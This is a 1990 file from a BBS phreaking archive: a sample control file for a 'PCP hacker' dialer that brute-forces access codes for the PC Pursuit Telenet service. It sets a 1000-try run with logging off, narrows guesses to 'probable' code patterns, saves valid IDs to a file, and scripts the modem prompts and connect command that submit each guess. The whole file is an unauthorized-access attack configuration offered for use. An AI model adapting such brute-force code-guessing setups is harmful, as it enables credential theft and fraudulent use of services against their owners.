home *** CD-ROM | disk | FTP | other *** search
/ The Unsorted BBS Collection / thegreatunsorted.tar / thegreatunsorted / hacking / phreak_utils_pc / pcp.hak < prev    next >
Encoding:
Text File  |  1990-02-28  |  1.2 KB  |  30 lines

  1. * sample PCP hacker control file
  2. TEST = NO            * run for real...
  3. LOG = NO             * don't write hack attempts
  4. CODEZ = PCP.IDS     * please save valid Ids here.
  5. DIAL = 38             * Telenet is number 38 in my dialing directory
  6. COUNT = 1000          * try 1000 times
  7. STOP = YES            * just get me one code...
  8. DELAY = 2       * wait 2 seconds for GOOD/NOGOOD string
  9. PLATE0 = &&&         * three letters
  10. PLATE1 = ######&      * HACK 6 numbers, and a letter
  11. PLATE2 = &####&          * hack a letter, 4 numbers, and one letter
  12. *                     note that the plates are over ridden below
  13. *                  cause I like to limit my searches to probable
  14. *                  values..
  15. PLATE0 = PJJ
  16. PLATE1 = 101###P
  17. PLATE2 = P1###P
  18. NOGOOD = INVALID USER* If I get this, the code is no good.
  19. *
  20. *  The next records control the modem and hacking...
  21. *
  22. SEND = @* SEND an @ sign
  23. WAIT = 5* WAIT 5 TENTHS OF A SECOND
  24. SEND = D^M^J* SEND D and a CARRIAGE RETURN LIne feed
  25. WAIT = TERMINAL=* Wait for the terminal prompt
  26. SEND = ^M^J* and send a carriage return linefeed
  27. LOOP     * repeat the next records until we get through
  28. WAIT = @* wait for the prompt
  29. HACK = C D/CAOAK/24,PLATE0PLATE1,PLATE2^M^J* hack it
  30.